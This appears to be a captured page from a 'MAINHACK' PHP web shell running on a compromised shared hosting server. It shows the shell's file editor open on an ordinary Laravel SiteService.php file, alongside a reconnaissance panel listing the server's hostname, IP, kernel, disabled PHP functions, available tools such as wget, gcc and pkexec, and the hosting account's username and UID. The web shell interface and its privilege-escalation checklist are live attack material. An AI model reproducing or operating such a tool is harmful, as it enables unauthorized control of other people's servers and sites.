[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: SiteService.php
<?php namespace App\Services; use App\Enums\Activity; use App\Http\Requests\SiteRequest; use App\Libraries\QueryExceptionLibrary; use App\Models\Currency; use Dipokhalder\EnvEditor\EnvEditor; use Exception; use Illuminate\Support\Facades\Artisan; use Illuminate\Support\Facades\Log; use Smartisan\Settings\Facades\Settings; class SiteService { public EnvEditor $envService; public function __construct(EnvEditor $envEditor) { $this->envService = $envEditor; } /** * @throws Exception */ public function list() { try { return Settings::group('site')->all(); } catch (Exception $exception) { Log::info($exception->getMessage()); throw new Exception(QueryExceptionLibrary::message($exception), 422); } } /** * @throws Exception */ public function update(SiteRequest $request) { try { $currency = Currency::find($request->site_default_currency); $app_debug = $this->envService->getValue('DEMO') ? Activity::DISABLE : $request->site_app_debug; $data = $request->validated(); $data['site_default_currency_symbol'] = $currency->symbol; $data['site_app_debug'] = $app_debug; Settings::group('site')->set($data); $this->envService->addData([ 'APP_DEBUG' => $app_debug == Activity::ENABLE ? 'true' : 'false', 'TIMEZONE' => $request->site_default_timezone, 'CURRENCY' => $currency?->code, 'CURRENCY_SYMBOL' => $currency?->symbol, 'CURRENCY_POSITION' => $request->site_currency_position, 'CURRENCY_DECIMAL_POINT' => $request->site_digit_after_decimal_point, 'DATE_FORMAT' => $request->site_date_format, 'TIME_FORMAT' => $request->site_time_format, 'NON_PURCHASE_QUANTITY' => $request->site_non_purchase_product_maximum_quantity ]); Artisan::call('optimize:clear'); return $this->list(); } catch (Exception $exception) { Log::info($exception->getMessage()); throw new Exception(QueryExceptionLibrary::message($exception), 422); } } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.87 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285